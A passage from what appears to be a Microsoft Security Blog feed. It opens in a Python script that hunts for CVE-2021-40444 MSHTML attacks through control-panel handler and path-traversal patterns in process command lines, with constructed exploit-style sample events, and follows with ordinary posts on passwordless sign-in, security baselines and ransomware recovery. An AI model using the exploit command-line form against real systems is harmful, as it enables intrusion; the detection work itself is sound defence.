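TRAVERSAL_RE = re.compile(r'".[a-zA-Z]{2,4}:\.\./\.\.')


@dataclass
class ProcessEvent:
    """One process-creation record; field names are assumed, mirroring the
    FileName / ProcessCommandLine columns the query reads."""
    device_name: str
    file_name: str
    command_line: str


def classify(event: ProcessEvent) -> Optional[str]:
    """Return the name of the matching rule, or None for a benign event.

    'cpl-handler' mirrors `FileName in~ (...) and ProcessCommandLine has ".cpl:"`;
    KQL `has` is a case-insensitive term match, so the command line is lower-cased.
    'path-traversal' mirrors the case-sensitive `matches regex` clause.
    """
    if event.file_name.lower() in CPL_HOSTS and ".cpl:" in event.command_line.lower():
        return "cpl-handler"
    if TRAVERSAL_RE.search(event.command_line):
        return "path-traversal"
    return None


def hunt(events: List[ProcessEvent]) -> List[Tuple[str, str, str]]:
    """Run the classifier over a batch; return (device, file_name, rule) per hit."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((ev.device_name, ev.file_name, rule))
    return hits


# Constructed sample telemetry, not real captures. The first two are routine
# Control Panel launches that must not alert (note "timedate.cpl" without the
# ":" handler syntax); the last two exercise one rule each.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "control.exe", "control.exe /name Microsoft.WindowsFirewall"),
    ProcessEvent("ws01", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"),
    ProcessEvent("ws02", "CONTROL.EXE", 'control.exe ".CPL:../../../placeholder/constructed.inf"'),
    ProcessEvent("ws03", "unknownhost.exe", 'unknownhost.exe ".abc:../../placeholder"'),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("ALERT", *hit)
```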


The post Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability appeared first on Microsoft Security Blog.

The passwordless future is here for your Microsoft account

September 15th, 2021

Nobody likes passwords. They’re inconvenient. They’re a prime target for attacks. Yet for years they’ve been the most important layer of security for everything in our digital lives—from email to bank accounts, shopping carts to video games.

We are expected to create complex and unique passwords, remember them, and change them frequently, but nobody likes doing that either. In a recent Microsoft Twitter poll, one in five people reported they would rather accidentally “reply all”—which can be monumentally embarrassing—than reset a password.

But what alternative do we have?

For the past couple of years, we’ve been saying that the future is passwordless, and today I am excited to announce the next step in that vision. In March 2021, we announced that passwordless sign-in was generally available for commercial users, bringing the feature to enterprise organizations around the world.

Beginning today, you can now completely remove the password from your Microsoft account. Use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email to sign in to your favorite apps and services, such as Microsoft Outlook, Microsoft OneDrive, Microsoft Family Safety, and more. This feature will be rolled out over the coming weeks.

The problem with passwords

My friend, Bret Arsenault, our Chief Information Security Officer (CISO) here at Microsoft likes to say, “Hackers don’t break in, they log in.” That has stuck with me ever since I first heard him say it because it’s so true.

Weak passwords are the entry point for the majority of attacks across enterprise and consumer accounts. There are a whopping 579 password attacks every second—that’s 18 billion every year.

Why are passwords so vulnerable? There are two big reasons.

Human nature

Except for auto-generated passwords that are nearly impossible to remember, we largely create our own passwords. But, given the vulnerability of passwords, requirements for them have gotten increasingly complex in recent years, including multiple symbols, numbers, case sensitivity, and disallowing previous passwords. Updates are often required on a regular basis, yet to create passwords that are both secure enough and memorable enough is a challenge. Passwords are incredibly inconvenient to create, remember, and manage across all the accounts in our lives.

Graphic depicting how new passwords that are secure enough are hard to remember.

Graphic depicting how a new password that is easy to remember is not secure enough.

Forgetting a password can be painful too. I was shocked to learn that nearly a third of people say they completely stop using an account or service rather than dealing with a lost password. That’s not only a problem for the person stuck in the password cycle, but also for businesses losing customers.

To solve these problems and create passwords we can remember, we try and make things easier for ourselves. We often rely on known and personal words and phrases. One of our recent surveys found that 15 percent of people use their pets’ names for password inspiration. Other common answers included family names and important dates like birthdays. We also found 1 in 10 people admitted reusing passwords across sites, and 40 percent say they’ve used a formula for their passwords, like Fall2021, which eventually becomes Winter2021 or Spring2022.

Hacker nature

Unfortunately, while such passwords may be easier to remember, they are also easier for a hacker to guess. A quick look at someone’s social media can give any hacker a head start on logging into their personal accounts. Once that password and email combination has been compromised, it’s often sold on the dark web for use in any number of attacks.

Hackers also have a lot of tools and techniques. They can use automated password spraying to try many possibilities quickly. They can use phishing to trick you into putting your credentials into a fake website. These tactics are relatively unsophisticated and have been in play for decades, but they continue to work because passwords continue to be created by humans.

Go passwordless today with a few quick clicks

First, ensure you have the Microsoft Authenticator app installed and linked to your personal Microsoft account.

Next, visit your Microsoft account, sign in, and choose Advanced Security Options. Under Additional Security Options, you’ll see Passwordless Account. Select Turn on.

Microsoft Authenticator screen showing the option to go passwordless.

Finally, follow the on-screen prompts, and then approve the notification from your Authenticator app. Once you’ve approved, you’re free from your password!

Microsoft Authenticator screen showing password has been successfully removed.

If you decide you prefer using a password, you can always add it back to your account. But I hope you’ll give passwordless a try—I don’t think you’ll want to go back.

Learn more about going passwordless

We’ve heard great feedback from our enterprise customers who have been on the passwordless journey with us. In fact, Microsoft itself is a great test case—nearly 100 percent of our employees use passwordless options to log in to their corporate accounts.

You can read more about our passwordless journey in a blog from Joy Chik, Corporate Vice President of Identity, or hear more about the benefits for people using Edge or Microsoft 365 apps from Liat Ben-Zur. To learn more about how Microsoft solutions, such as Microsoft Azure Active Directory and Microsoft Authenticator, are allowing users in organizations to forget their passwords while staying protected, join our digital event Your Passwordless Future Starts Now on October 13, 2021.

Learn more about enabling passwordless sign-in with the Microsoft Authenticator app here.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.



Security baseline for Microsoft Edge v93

September 13th, 2021

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 93!


We have reviewed the settings in Microsoft Edge version 93 and updated our guidance with the addition of 1 setting and the removal of 1 setting. Additionally, there is 1 setting worth mentioning. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the version 93 package from the Security Compliance Toolkit.


Enable 3DES cipher suites in TLS (added)

We are enforcing this setting to ensure it remains disabled. 3DES will be completely removed from Microsoft Edge in version 95 (around October 2021) and this policy will stop working at that point. Once it does, we will remove this setting from the baseline. If your server relies upon 3DES support, it should be updated as soon as possible to ensure that modern browsers can continue to connect.


Default Adobe Flash setting (removed)

Now that Adobe Flash support has ended and been removed from Microsoft Edge, we have removed the requirement to disable this setting.


Configure users’ ability to override feature flags (worth mentioning)

Some customers have been asking for this policy setting to further lock down what feature flag settings an end-user may configure. If this policy is configured, it can prevent users from reconfiguring Edge settings exposed by the edge://flags page and/or via command line arguments. A tech-savvy user may uncover unsupported mechanisms for adjusting feature flag settings, but this policy allows blocking both supported mechanisms.


Microsoft Edge version 93 introduced 31 new computer settings and 26 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baseline Community or this post.


Afternoon Cyber Tea: Learn how to stop misinformation threats from nation-state bad actors

September 13th, 2021

Information has long been wielded as an instrument of national power and influence. In today’s digital world, misinformation can also be just as powerful.

On a special episode of Afternoon Cyber Tea with Ann Johnson, Sandra Joyce, Executive Vice President and Head of Mandiant Intelligence at FireEye, joined me to talk about threat attribution and accountability when it comes to the use of technology by bad actors to help spread misinformation.

As a US Air Force Reserve officer and faculty member at the National Intelligence University with four master’s degrees in cyber policy, international affairs, science and technology intelligence, and military operational art and science, Sandra is an expert in understanding how nation-state actors leverage traditional and social media channels to erode confidence in free and fair elections. Sometimes, those bad actors will turn core democratic values, such as freedom of speech, against us, according to Sandra. For instance, she recounts the story of a foreign group that used those values against the US by fabricating letters from concerned citizens to be published in US newspapers.

In this powerful episode, Sandra discusses how threat actors are adopting new threat techniques—shifting from signature malware to commodity malware—and pivoting to smaller malware families that they hope will be overlooked by cybersecurity professionals. That combination will make it harder to detect threats amid the noise. She recommends that organizations research threats and undertake a threat profile on themselves to learn their vulnerabilities and the biggest threats that could target them. That can shape priorities. Using the metaphor of bank robbers, she says it’s not so hard to rush the guards in a building but is hard to learn the location of the safe, get the combination to the safe, and escape undetected. The latter is where the bulk of business intrusion happens. Companies need to root out threats in that lateral stage.

During our conversation, we also spoke about threat intelligence and what’s involved in threat actor attribution. After recognizing a cluster of threat activity, there’s a lot of work required to identify which organization or country is behind the threat. It usually takes months to collect information about the threat’s techniques, infrastructure, and command and control (C2) channel, which is the channel a threat actor uses to commandeer an individual host or to control a botnet of millions of machines. For years, FireEye’s Mandiant Threat Intelligence team has been tracking the financial crime group FIN11, which deploys point-of-sale malware targeting the financial, retail, restaurant, and pharmaceutical industries. Both technical indicators and targeting information prove useful in these investigations, in part because they reveal the bad actors’ intentions. To learn what organizations can do to combat threats, listen to Afternoon Cyber Tea with Ann Johnson: Taking a “when, not if” approach to cybersecurity on Apple Podcasts or PodcastOne.

What’s next

A new season of Afternoon Cyber Tea with Ann Johnson launches this October 2021 on The CyberWire! In this important cyber series, I talk with cybersecurity influencers about trends shaping the threat landscape and explore the risk and promise of systems powered by AI, IoT, and other emerging tech.

You can listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts: You can also download the episode by clicking the Episode Website link.
  • PodcastOne: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.



Combat attacks with security solutions from Trustwave and Microsoft

September 9th, 2021

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

In 2021, cyberattacks and instances of ransomware demands against companies, agencies, and institutions have dominated the headlines. These kinds of attacks are on the rise and often have long-reaching impacts that can spill over across supply chains. In just the first half of the year, there have been several high-profile cyberattacks in the United States including Colonial Pipeline [1], JBS (the world’s largest meat supplier) [2], the Washington, D.C. Police Department [3], and the MTA of New York City [4], to name a few.

The SolarWinds cybersecurity breach [5] opened US government networks and private companies’ security systems around the world to threat actors in late 2020. This breach allowed access to confidential government data and intel before being discovered. The innovative bad actors attached their malware to a software update from SolarWinds’ Orion software in March through June of 2019, which led to tens of thousands of customers’ security being compromised. SolarWinds serves as an unfortunate example of how organizations around the world operate under the perpetual threat of becoming a target of a cyberattack or the victim of a cybercrime, even from a trusted partner.

Some believe the escalation in attacks and data breaches in the past year likely originated with new remote working environments, which exponentially increased the number of endpoints that required protection, putting strain on already over-extended IT resources [6].

Take a proactive approach to your security

To identify, contain, and eradicate these relentless threats properly, security operations must include effective platforms, processes, and people. With attacks on the rise and bad actors only becoming more sophisticated, security that meets the minimum is no longer effective, and organizations need to consider a more proactive approach. Microsoft Defender for Endpoint is a holistic, cloud-delivered endpoint security solution that includes risk-based vulnerability management and assessment, attack surface reduction, behavior-based next-generation protection, rich APIs, and unified security management.

Microsoft security solutions have native capability designed to work cohesively to provide integrated threat detection and response capabilities, but technology alone is not enough. The benefits derived from leveraging best-in-breed tools can mean the difference in capturing a threat or letting it linger, unnoticed in your environment indefinitely. Partnering with a Managed Detection and Response (MDR) team/Managed Security Services Provider (MSSP) who is a trusted Microsoft technology partner can help you operationalize these transformations and derive the most value from your existing technology investments.

Trustwave removes the complexity and burden of threat detection and response with an entire portfolio of cybersecurity solutions that work with existing Microsoft investments to fight cybercrime, protect data, and reduce risk. Knowing what to look for in your security partners is crucial, especially among the noise of an industry saturated with providers claiming to be the “best.” Search for partners that can offer:

  • All-day monitoring/notification, incident response, and remediation.
  • Data forensics and investigation response (DFIR).
  • Proactive, human-led threat hunting.

With organizations facing overwhelmed security teams and resource limitations, finding the time and staff to properly protect their environments—on-premises, in the cloud, or a hybrid of both—is a constant challenge. Implementing proactive endpoint detection and response (EDR) and MDR solutions can relieve your teams, prevent breaches, and appease your stakeholders. For real examples of how effective the EDR plus MDR combination can be when aligned to create a layered security posture, view Trustwave’s case study on the GoldenSpy malware or view their industry accolades showcasing the industry expertise their teams have worked to earn for the safety of organizations like yours.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


[1] Colonial Pipeline Attack Spotlights the Importance of Ransomware Preparedness, Trustwave, 11 May 2021.

[2] JBS: Cyber-attack hits world’s largest meat supplier, BBC News, 02 June 2021.

[3] D.C. Police Department Data Is Leaked in a Cyberattack, The New York Times, 27 April 2021.

[4] MTA breached by hackers with reported ties to China, Kevin Duggan, MSN, 03 June 2021.

[5] A ‘Worst Nightmare’ Cyberattack: The Untold Story Of The SolarWinds Hack, Dina Temple-Raston, Monika Evstatieva, NPR, 16 April 2021.

[6] How Your Security Testing Mindset Should Change After COVID-19, Mark Whitehead, Trustwave, 04 May 2021.


Why diversity is important for a strong cybersecurity team

September 9th, 2021

Medicine. Aeronautics. Academia. When you’re a cybersecurity professional, the colleague next to you could have started in one of these industries—or just about any other you can imagine. The backgrounds of cybersecurity professionals are more diverse than those of professionals in other industries. And because cybersecurity as an industry is so new, these professionals likely didn’t study security in school either. That includes LinkedIn’s Chief Information Security Officer (CISO) Geoff Belknap, who graduated college with a business degree. I hosted Geoff on a recent episode of Security Unlocked with Bret Arsenault to talk about strategies for recruiting cybersecurity talent and for solving the cybersecurity skills gap.

Strengthen your cybersecurity team through diversity

Geoff, who joined LinkedIn in 2019, leads the organization’s internal security teams in building a safe, trusted, and professional platform. He brings more than 22 years of experience in network architecture and security leadership to his role at LinkedIn. He previously was the CISO at Slack, where he built the security organization from the ground up, including laying the groundwork for Slack’s production incident management process. He earned a Bachelor of Science degree in Business Management at Western Governors University. One of his favorite things about cybersecurity is that it’s a multi-disciplinary and inter-disciplinary practice where people from different specialties, including business and other non-technical backgrounds, can contribute.

One of cybersecurity’s much-discussed biggest challenges is the skills gap. The cybersecurity industry is projected to triple year-over-year through 2022, but the shortage of cybersecurity professionals is in the millions globally, according to an article in The CyberWire [1]. The skills gap is caused, in part, because the industry is relatively new and people don’t receive training on how to work in cybersecurity, according to Geoff. If a company wants to interview 10 candidates with 20 years of experience for a cloud security engineer role, it could be waiting for a very long time.

He recommends that organizations expand their idea of the right person for an open cybersecurity position. Stop thinking that the only person that is right for a role in cybersecurity majored in cybersecurity in college and that a principal-level network security cloud architect will be an expert in all three cloud platforms. Instead, consider people who can process and analyze a collection of information, understand your company’s technology, and understand what the organization is trying to accomplish and the tools available. Inquisitive people who are passionate about problem-solving can grow into a cybersecurity position and become effective contributors to the organization. By investing in people with useful raw skills and developing their cybersecurity skills, organizations fill roles and add valuable diverse perspectives to their cybersecurity teams.

Once you fill those cybersecurity roles, retaining employees is critical. The secret to that is always company culture, Geoff said. Compassion and empathy are not only good traits to adopt but also essentials for an organization wanting to attract and retain the best talent. Authentic organizations care about their people and recognize that they need time outside work. After all, psychologically healthy people are the best asset for any organization.

During our conversation, Geoff also shared his appreciation for the Zero Trust approach because it reinforces the idea that there is no safe haven. Security is a thought process rather than an end goal you can attain. Acknowledging that there is no castle where you can lock away your data and keep it safe makes you rethink your production environment and your risk assessment. That’s a powerful realization because it puts you on a path to explore why things aren’t as secure as they should be, according to Geoff. To learn why he thinks cybersecurity professionals from nontraditional career paths can be especially successful in a Zero Trust environment, listen to Building a Stronger Security Team on The CyberWire.

What’s next

In this important cyber series, I talk with cybersecurity peers and Microsoft leaders about today’s biggest challenges in cybersecurity and practical guidance for security practitioners.

You can listen to Security Unlocked with Bret Arsenault on:

  • Apple Podcasts, Amazon Music, Google Podcasts, and Spotify. You can also download the episode by clicking The CyberWire link below.
  • The CyberWire: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics, such as building a security team and securing hybrid work.

To learn more, visit our website. In the meantime, bookmark the Security blog to keep up with our coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


[1] Understanding the cybersecurity skills gap and how education can solve it, Ingrid Toppelberg, The CyberWire, 19 April 2021.



Windows Server 2022 Security Baseline

September 9th, 2021

We are pleased to announce the release of the security baseline package for Windows Server 2022!


Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate.


Three new settings have been added for this release: an AppLocker update for Microsoft Edge, a new Microsoft Defender Antivirus setting, and a custom setting for printer driver installation restrictions.



Now that Microsoft Edge is included within Windows Server, we have updated the domain controller browser restriction list. The browser restriction list now restricts Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, and Microsoft Edge. Should additional browsers be used on your domain controllers, please update accordingly.


Script Scanning

Script scanning was a parity gap between Group Policy and MDM. Since this gap is now closed, we are enforcing the enablement of script scanning (Administrative Templates\Microsoft Defender Antivirus\Real-time Protection\Turn on script-scanning).


Restrict Driver Installations

In July, a Knowledge Base article and a subsequent patch were released for CVE-2021-34527, more commonly known as “PrintNightmare”. We have added a new setting to the MS Security Guide custom administrative template, SecGuide.admx/l (Administrative Templates\MS Security Guide\Limits print driver installation to Administrators), and enforced its enablement.


Please let us know your thoughts by commenting on this post or via the Security Baseline Community.


Coordinated disclosure of vulnerability in Azure Container Instances Service

September 8th, 2021

Microsoft recently mitigated a vulnerability in Azure Container Instances (ACI) reported by a security researcher. Our investigation surfaced no unauthorized access to customer data. Out of an abundance of caution, we notified customers with containers running on the same clusters as the researcher’s containers via Service Health Notifications in the Azure Portal. If you did not receive a notification, no action is required with respect to this vulnerability.


3 steps to prevent and recover from ransomware

September 7th, 2021

On July 14, 2021, the National Cybersecurity Center of Excellence [1] (NCCoE) at the National Institute of Standards and Technology [2] (NIST) hosted a virtual workshop [3] to seek feedback from government and industry experts on practical approaches to preventing and recovering from ransomware and other destructive cyberattacks. After we wrote up our feedback for NIST, we realized it would be helpful to share this perspective more broadly to help organizations better protect themselves against the rising tide of (highly profitable) ransomware attacks. While ransomware and extortion attacks are still evolving rapidly, we want to share a few critical lessons learned and shed some light on common misconceptions about ransomware attacks.

Clarifying attack terminology and scope

One common misconception about ransomware attacks is that they only involve ransomware (“pay me to get your systems and data back”), but these attacks have actually evolved into general extortion attacks. While ransom is still the main monetization angle, attackers are also stealing sensitive data (yours and your customers’) and threatening to disclose or sell it on the dark web or internet (often while holding onto it for later extortion attempts and future attacks).

We’re also seeing a widespread perception that ransomware is still constrained to basic CryptoLocker-style attacks, first seen in 2013, that only affect a single computer at a time (also known as the commodity model). Today’s attackers have evolved far beyond this, using toolkits and sophisticated affiliate business models to enable human operators to target whole organizations, deliberately steal admin credentials, and maximize the threat of business damage to targeted organizations. The ransomware operators often buy login credentials to organizations from other attack groups, rapidly turning what seems like a low-priority malware infection into a significant business risk.

Simple, prioritized guidance

We’ve also seen that many organizations still struggle with where to start, especially smaller operations with limited staff and experience. We believe all organizations should begin with simple and straightforward prioritization of efforts (three steps) and we have published this, along with why each priority is important.

Figure 1: Microsoft’s recommended mitigation prioritization: prepare, limit, and prevent.

Create detailed instructions

Microsoft has also found that many organizations struggle with the next level of the planning process. As a result, we built guidance to make following these steps as clear and easy as possible. Microsoft already works with NIST NCCoE on several efforts, including the Zero Trust effort, which supports Presidential Executive Order (EO) 14028 on Improving the Nation’s Cybersecurity. We welcome the opportunity for any additional ransomware-related work by providing clarifying guidance using whatever tools and technologies organizations have available.

Figure 2: Secure backup instructions from Microsoft’s human-operated ransomware page.

Microsoft’s recommended mitigation prioritization

Based on our experience with ransomware attacks, we’ve found that prioritization should focus on these three steps: prepare, limit, and prevent. This may seem counterintuitive since most people want to simply prevent an attack and move on. But the unfortunate truth is that we must assume breach (a key Zero Trust principle) and focus on reliably mitigating the most damage first. This prioritization is critical because of the high likelihood of a worst-case scenario with ransomware. While it’s not a pleasant truth to accept, we’re facing creative and motivated human attackers who are adept at finding a way to control the complex real-world environments in which we operate. Against that reality, it’s important to prepare for the worst and establish frameworks to contain and prevent attackers’ abilities to get what they’re after.

While these priorities should govern what to do first, we encourage organizations to run as many steps in parallel as possible (including pulling quick wins forward from step three whenever you can).

Step 1. Prepare a recovery plan: Recover without paying

  • What: Plan for the worst-case scenario and expect that it will happen at any level of the organization.
  • Why: This will help your organization:
    • Limit damage for the worst-case scenario: Restoring all systems from backups is highly disruptive to business, but it’s still more efficient than trying to do recovery using low-quality attacker-provided decryption tools after paying to get the key. Remember: paying is an uncertain path; you have no guarantee that the attackers’ key will work on all your files, that the tools will work effectively, or the attacker—who may be an amateur using a professional’s toolkit—will act in good faith.
    • Limit the financial return for attackers: If an organization can restore business operations without paying, the attack has effectively failed and resulted in zero return on investment for the attackers. This makes it less likely they will target your organization again in the future (and deprives them of funding to attack others). Remember: attackers may still attempt to extort your organization through data disclosure or abusing/selling the stolen data, but this gives them less leverage than possessing the only means of accessing your data and systems.
  • How: Organizations should ensure they:
    • Register risk. Add ransomware to the risk register as a high-likelihood and high-impact scenario. Track mitigation status via your Enterprise Risk Management (ERM) assessment cycle.
    • Define and backup critical business assets. Automatically back up critical assets on a regular schedule, including correct backup of critical dependencies, such as Microsoft Active Directory.
    • Protect backups. To safeguard against deliberate erasure and encryption, use offline storage, immutable storage, and/or out-of-band steps (multifactor authentication or PIN) before modifying or erasing online backups.
    • Test ‘recover from zero’ scenario. Ensure that your business continuity and disaster recovery (BC/DR) can rapidly bring critical business operations online from zero functionality (all systems down). Conduct practice exercises to validate cross-team processes and technical procedures, including out-of-band employee and customer communications (assume all email and chat are down). Important: protect (or print) supporting documents and systems required for recovery, including restoration-procedure documents, configuration management databases (CMDBs), network diagrams, and SolarWinds instances. Attackers regularly destroy these documents.
    • Reduce on-premises exposure. Move data to cloud services with automatic backup and self-service rollback.

Step 2. Limit the scope of damage: Protect privileged roles (starting with IT admins)

  • What: Ensure you have strong controls (prevent, detect, respond) for privileged accounts, such as IT admins and other roles with control of business-critical systems.
  • Why: This slows or blocks attackers from gaining complete access to steal and encrypt your resources. Taking away the attacker’s ability to use IT admin accounts as a shortcut to resources will drastically lower the chances that they’ll be successful in controlling enough resources to impact your business and demand payment.
  • How: Enable elevated security for privileged accounts—tightly protect, closely monitor, and rapidly respond to incidents related to these roles. See Microsoft’s recommended steps that:
    • Cover end-to-end session security (including multifactor authentication for admins).
    • Protect and monitor identity systems.
    • Mitigate lateral traversal.
    • Promote rapid threat response.

Step 3. Make it harder to get in: Incrementally remove risks

  • What: Prevent a ransomware attacker from entering your environment, as well as rapidly respond to incidents and remove attacker access before they can steal and encrypt data.
  • Why: This causes attackers to fail earlier and more often, undermining their profits. While prevention is the preferred outcome, it may not be possible to achieve 100 percent prevention and rapid response across a real-world organization with a complex multi-platform, multi-cloud estate and distributed IT responsibilities.
  • How: Identify and execute quick wins that strengthen security controls to prevent entry and rapidly detect and evict attackers, while implementing a sustained program that helps you stay secure. Microsoft recommends following the principles outlined in the Zero Trust strategy. Against ransomware, organizations should prioritize:
    • Improving security hygiene by reducing the attack surface and focusing on vulnerability management for assets in their estate.
    • Implementing protection, detection, and response controls for digital assets, as well as providing visibility and alerting on attacker activity while responding to active threats.

The takeaway

To counter the threat of ransomware, it’s critical to identify, secure, and be ready to recover high-value assets—whether data or infrastructure—in the likely event of an attack. This requires a sustained effort involving obtaining buy-in from the top level of your organization (like the board) to get IT and security stakeholders working together asking nuanced questions. For example, what are the critical parts of the business that could be disrupted? Which digital assets map to these business segments (files, systems, databases)? How can we secure these assets? This process may be challenging, but it will help set up your organization to make impactful changes using the steps recommended above.

To learn more, visit our page on how to rapidly protect against ransomware and extortion.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


[1] National Cybersecurity Center of Excellence.

[2] National Institute of Standards and Technology, US Department of Commerce.

[3] Virtual Workshop on Preventing and Recovering from Ransomware and Other Destructive Cyber Events, National Cybersecurity Center of Excellence, 14 July 2021.

The post 3 steps to prevent and recover from ransomware appeared first on Microsoft Security Blog.
